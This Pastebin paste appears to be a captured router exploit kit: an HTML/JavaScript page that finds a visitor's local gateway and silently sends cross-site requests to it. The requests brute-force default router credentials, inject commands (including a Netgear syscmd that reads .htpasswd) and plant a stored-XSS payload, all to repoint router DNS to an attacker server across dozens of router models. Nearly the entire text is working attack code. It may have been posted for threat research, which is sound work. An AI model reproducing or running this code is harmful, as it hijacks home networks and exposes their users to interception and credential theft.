API tools faq
paste
Kafeine

REK - Router EK

Kafeine
May 18th, 2015
7,807
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 14.64 KB | None | 0 0
raw download clone embed print report diff
  1. <html><head><script type="text/javascript" src="e_x.js"></script></head>
  2. <body>
  3. <iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
  4. <script language="javascript">
  5. var pDNS = "37.139.50.45";
  6. var sDNS = "8.8.8.8";
  7. var passlist=["123456789","root","admin","qwerty","123456789","baseball","football","monkey","letmein","abc123","tata","<eopl>"];
  8. var gstp=400;
  9. var pstp=5000;
  10. function exp(url, data, method){
  11.     if(method=="GET"){
  12.     document.write('<style type="text/css">@import url('+url+'&ju='+ Math.random()+');</style>');
  13.     if(url.indexOf('<eopl>')>0){var tm=setTimeout(function(){window.stop();},gstp);}
  14.     }
  15.     else{
  16.         document.write('<body></body>');
  17.         var ifrm = document.createElement('IFRAME');
  18.         ifrm.height="1px";
  19.         ifrm.width="1px";
  20.         document.body.appendChild(ifrm);
  21.        
  22.         var f=ifrm.contentWindow.document.createElement('FORM');
  23.         f.name='f';
  24.         f.method=method;
  25.         f.action=url;
  26.         var el=data.split('&');
  27.         for(i=0;i<el.length;i++)
  28.         {
  29.             var e=el[i].split('=');
  30.             var t=ifrm.contentWindow.document.createElement('INPUT');
  31.             t.type='TEXT';
  32.             t.id=e[0];
  33.             t.name=e[0];
  34.             t.value=e[1];
  35.             f.appendChild(t);
  36.         }
  37.         ifrm.contentWindow.document.body.appendChild(f);
  38.         f.submit();
  39.         var tm=setTimeout(function(){window.stop();},pstp);
  40.     }
  41. }
  42. function srq(ip) {
  43.     for(i=0;i<12;i++){
  44.    
  45.     var url1 = "http://$1$"+ip+"/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&hostName=TL-WR941ND&Save=Save";
  46.     var method = "GET";
  47.     url = url1.replace("$1$","");
  48.     var cred="admin";
  49.     if(passlist[i]!="")
  50.         cred=cred+":"+passlist[i];
  51.     cred = cred+"@";   
  52.     url = url1.replace("$1$",cred);
  53.     exp(url, "", method);
  54.     }
  55.    
  56. }
  57. function e_belkin(ip)
  58. {
  59.     var method = "POST";
  60.     var url = "";
  61.     var data ="";
  62.    
  63.     url="http://"+ip+"/cgi-bin/login.exe?pws=admin";
  64.     exp(url, "", "GET");
  65.    
  66.     url="http://"+ip+"/cgi-bin/setup_dns.exe";
  67.     data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"&dns2_1_t="+sDNS.split('.')[0]+"&dns2_2_t="+sDNS.split('.')[1]+"dns2_3_t="+sDNS.split('.')[2]+"&dns2_4_t="+sDNS.split('.')[3]+"&auto_from_isp=0";
  68.     exp(url, data, method);
  69. }
  70.  
  71. function e_webcam(ip)
  72. {
  73.     var method = "POST";
  74.     var url = "";
  75.     var data ="";
  76.    
  77.     url="http://"+ip+"/cgi-bin/webcm";
  78.     data="getpage=../html/home.htm&errorpage=../html/index.html&login:command/username=admin&login:command/password=admin&var:errormsg=Error";
  79.     exp(url, data, method);
  80.    
  81.     url="http://"+ip+"/cgi-bin/webcm";
  82.     data="getpage=../html/setup/dns.htm&resolver:settings/nameserver1="+pDNS+"&resolver:settings/nameserver2="+sDNS+"&dproxy:settings/state=2";
  83.     exp(url, data, method);
  84. }
  85.  
  86.  
  87. function p_exp(ip) {
  88.     e_belkin(ip);
  89.     e_webcam(ip);
  90.    
  91.     var method = "POST";
  92.     var url = "";
  93.     var data ="";
  94.    
  95.     url = "http://admin:admin@"+ip+"/apply.cgi";
  96.     data="submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcplan_ip_addr=192.168.1.1&lan_dhcp_start=192.168.1.100&lan_dhcp_end=192.168.1.149&lan_dns0="+pDNS+"&lan_dns1="+sDNS+"&lan_netmask=255.255.255.0&machine_name=Cisco01723&lan_proto=dhcp&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&lan_dns0_0=217&lan_dns0_1=12&lan_dns0_2=208&lan_dns0_3=38&lan_dns1_0=8&lan_dns1_1=8&lan_dns1_2=8&lan_dns1_3=8";
  97.     exp(url, data, method);
  98.    
  99.     url="http://admin:admin@"+ip+"/apply.cgi?/BAS_update.htm";
  100.     data="submit_flag=ether&ether_dnsaddr1="+pDNS+"&ether_dnsaddr2="+sDNS+"&ether_dnsaddr3=8.8.8.8&Apply=Apply";
  101.     exp(url, data, method);
  102.    
  103.     url="http://"+ip+"/goform/AdvSetDns";
  104.     data="GO=wan_dns.asp&rebootflag=&DESN=1&DNSEN=on&DS1="+pDNS+"&DS2="+sDNS;
  105.     exp(url, data, method); /*Unicorn WB-3300NR*/
  106.    
  107.     url="http://"+ip+"/login.cgi";
  108.     data="login_name=admin&login_pass=";
  109.     exp(url, data, method);
  110.    
  111.     url="http://"+ip+"/h_wan_fix.cgi";
  112.     data="static_dns1="+pDNS+"&static_dns2="+sDNS;
  113.     exp(url, data, method);
  114.    
  115. }
  116.  
  117. function e_moto(ip)
  118. {
  119.     /*var method = "GET";
  120.     var url ="http://" + ip + "/frames.asp?userId=admin&password=motorola";
  121.     exp(url, "", method);  
  122.    
  123.     url ='http://' + ip + 'Gateway.Wan.hostName=&Gateway.Wan.dhcpClientEnabled=0&Gateway.Wan.ipAddress=0.0.0.0&Gateway.Wan.subnetMask=0.0.0.0&Gateway.Wan.defaultGateway=0.0.0.0&Gateway.Wan.dnsAddress1=3.3.3.3&Gateway.Wan.dnsAddress2=2.2.2.2&Gateway.Wan.dnsAddress3=0.0.0.0&Gateway.Wan.tcpSessionWaitTimeout=300&Gateway.Wan.udpSessionWaitTimeout=300&Gateway.Wan.icmpSessionWaitTimeout=300&urlOk=gateway%2FgatewayWAN.asp&urlError=gateway%2FgatewayWAN.asp%3FsessionId%3D2144%26error%3Derror&BUTTON_INPUT=Apply';
  124.     exp(url, "", POST); */
  125.     var i1 = document.createElement('IMG');
  126.     document.body.appendChild(i1);
  127.     var i2 = document.createElement('IMG');
  128.     document.body.appendChild(i2);
  129.     i1.src='http://'+ip+'/frames.asp?userId=admin&password=motorola';
  130.     i2.src='http://'+ip+'/goformFOO/AlFrame?Gateway.VirtualServerAdvConfig.add=Add&Gateway.VirtualServerAdvConfig.serverId.entry="%27%2B(window.onload%3Dfunction(){with(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dhcpClientEnabled=0%27%3Bz=%27%27%3Bfor(c in {%27Gateway.Wan.ipAddress%27:0,%27Gateway.Wan.subnetMask%27:0,%27Gateway.Wan.defaultGateway%27:0})z%2B=c%2B%27=%27%2Bdocument.getElementById(c).value%2B%27%26%27%3Bwith(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dnsAddress1='+pDNS+'%26%27%2Bz%2B%27%26Gateway.Wan.dhcpClientEnabled=0%27})%2B%27';
  131.    
  132. }/*Motorola*/
  133.  
  134. function r_exp(ip) {
  135.    
  136.     var method = "GET";
  137.     var url ="";//http://admin:admin@"+ip+"?ju="+ Math.random();
  138.     //exp(url, "", method);
  139.    
  140.     url="http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=WW=`wget 'http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1&curpath=/&currentsetting.htm=1' -O-` & wget --post-data='h_DNStype=Fixed&c4_DNS1address="+pDNS+"&c4_DNS2address="+sDNS+"&runtest=&todo=save&this_file=pppoe.htm&next_file=basic.htm' -O- 'http://$WW@"+ip+"/setup.cgi'&curpath=/&currentsetting.htm=1";
  141.     exp(url, "", method); /*DGN 1000/DGN2200*/
  142.    
  143.     url="http://admin:admin@"+ip+"/start_apply.htm?current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&wan_unit=0&wan_enable=1&wan_nat_x=1&wan_dnsenable_x=0";
  144.     exp(url, "", method); /*asus rt n66u*/
  145.    
  146.     url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1="+pDNS+"&wan_dns2="+sDNS+"&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&productid=RT-N56U&current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_proto=dhcp&wan_enable=1&wan_nat_x=1&wan_upnp_enable=1&wan_dhcpenable_x=1&wan_dnsenable_x=0&dhcpc_mode=1";
  147.     exp(url, "", method); /*asus rt n56u*/
  148.    
  149.     url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS;
  150.     exp(url, "", method); /*asus rt n56u*/
  151.    
  152.     url="http://"+ip+"/start_apply.htm?current_page=tcpipwan.asp&ipMode=pptp&typeForm=formWanTcpipSetup&submit-url=%2Ftcpipwan.asp&action_mode=Restart_WAN&flag=nodetect&preferred_lang=EN&wanType=autoIp&fixedIpMtuSize=1500&dnsMode=dnsManual&dns1="+pDNS+"&dns2="+sDNS;
  153.     exp(url, "", method);/*asus nt-12*/
  154.    
  155.     url = "http://admin:admin@"+ip+"/setup.cgi?todo=wan_dns1="+pDNS+"";
  156.     exp(url, "", method);
  157.    
  158.     url = "http://admin:admin@"+ip+"/setup_dns.stm?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  159.     exp(url, "", method);
  160.    
  161.     url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  162.     exp(url, "", method); /*Philips*/
  163.    
  164.     url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  165.     exp(url, "", method);/*Motorola SBG901*/
  166.      
  167.     url ="http://"+ip+"/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP"
  168.     exp(url, "", method);
  169.    
  170.     url ="http://"+ip+"/apply.cgi?wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS;
  171.     exp(url, "", method);
  172.    
  173.     url ="http://admin@"+ip+"/apply.cgi?wan_specify_dns=1&dhcpc_use_ucast=1&classless_static_route=0&asp_temp_51=&asp_temp_52=dhcpc&reboot_type=wan&button=Save+Settings&wan_proto=dhcpc&opendns_enable=0&dns_relay=1&hostname=DIR-615&dhcpc_use_ucast_sel=1&wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS+"&wan_mtu=1500";
  174.     exp(url, "", method);
  175.    
  176.     url ="http://"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  177.     exp(url, "", method);
  178.    
  179.     url ="http://admin:password@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  180.     exp(url, "", method);
  181.    
  182.     url ="http://Admin:1234@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  183.     exp(url, "", method);
  184.    
  185.     url ="http://user:user@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  186.     exp(url, "", method);
  187.    
  188.     url ="http://admin:admin@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  189.     exp(url, "", method);
  190.    
  191.     url ="http://"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  192.     exp(url, "", method);
  193.    
  194.     url = "http://admin:admin@"+ip+"/router/add_dhcp_segment.cgi?dhcp_on_chk=0&dhcp_server_on=1&dhcp_start_ip1="+ip+"&dhcp_end_ip1="+ip+"54&dhcp_start_ip2=&dhcp_end_ip2=&dhcp_start_ip3=&dhcp_end_ip3=&lan_as_gw_chk=0&is_lan_as_gw=1&custom_gw=&lease_time=86400&is_router_as_dns=1&dns1="+pDNS+"&dns2="+sDNS+"&dns3=&auto_bind=1&submitbutton=+%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88+";
  195.     exp(url, "", method);
  196.    
  197.     url = "http://user:user@"+ip+"/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1="+ip+"&ip2="+ip+"&Lease=120&gateway=0.0.0.0&domain=&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=%B1%A3+%B4%E6";
  198.     exp(url, "", method);
  199.    
  200.     url = "http://admin:admin@"+ip+"/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip="+ip+"&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0="+pDNS.split('.')[0]+"&dns0_1="+pDNS.split('.')[1]+"&dns0_2="+pDNS.split('.')[2]+"&dns0_3="+pDNS.split('.')[3]+"&dns1_0="+sDNS.split('.')[0]+"&dns1_1="+sDNS.split('.')[1]+"&dns1_2="+sDNS.split('.')[2]+"&dns1_3="+sDNS.split('.')[3]+"&dns2_0=8&dns2_1=8&dns2_2=8&dns2_3=8&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en";
  201.     exp(url, "", method);
  202.    
  203.     url ="http://admin:admin@"+ip+"/userRpm/WanStaticIpCfgRpm.htm@wan=0&wantype=1&ip=0.0.0.0&mask=0.0.0.0&gateway=0.0.0.0&mtu=1500&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=Save";
  204.     exp(url, "", method);
  205.    
  206.     url ="http://"+ip+"/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&downBandwidth=0&upBandwidth=0&Save=&Advanced=Advanced";
  207.     exp(url, "", method);
  208.    
  209.     url ="http://admin:password@"+ip+"/start_apply.htm?dnsserver="+pDNS+"&dnsserver2="+sDNS+"";
  210.     exp(url, "", method);
  211.    
  212.     url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&uiViewNetMask=255.255.255.0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP="+ip+"00&sysPoolCount=100&dhcp_LeaseTime=259200&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+pDNS+"";
  213.     exp(url, "", method);
  214.    
  215.     url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS;
  216.     exp(url, "", method);
  217.    
  218.     url = "http://root:root@"+ip+"/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS
  219.     exp(url, "", method);
  220.    
  221.     url = "http://admin:admin@"+ip+"/prim.htm?i00110004="+pDNS+"&i00110005="+sDNS+"&i00035007="+pDNS+"&i00035008="+sDNS+"&i00040700="+pDNS+"&i00040800="+sDNS+"&i001e0008="+pDNS+"&i001e0009="+sDNS+"&_sce=%25ssc";
  222.     exp(url, "", method); /*DI 604*/
  223.    
  224.    
  225.     var t=setTimeout(function(){p_exp(ip);},1000);
  226.     srq(ip);
  227.     e_moto(ip);
  228. }
  229. var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome');
  230. //if(document.referrer=="" || is_chrome<0){window.location.replace("about:blank")};
  231.  
  232. getIPs(function(ip) {
  233.     if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)) {
  234.         var gw = ["192.168.1.1", "192.168.0.1", "192.168.0.227", "10.1.1.1", "10.0.0.1", "192.168.2.1", "192.168.1.2", "192.168.2.2", "192.168.1.254"];
  235.         var sip = ip.split(".");
  236.         ip = sip[0] + "." + sip[1] + "." + sip[2] + ".1";
  237.         var i = 0;
  238.         var j = 0;
  239.         for (i = 0; i < gw.length; i++) {
  240.             if (ip == gw[i]) {
  241.                 j = j + 1;
  242.                 break;
  243.             }
  244.         };
  245.         i = i + 1;
  246.         if (j > 0) {
  247.             r_exp(ip);
  248.         };
  249.     }
  250. });
  251.  
  252. </script>
  253. </body>
  254. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!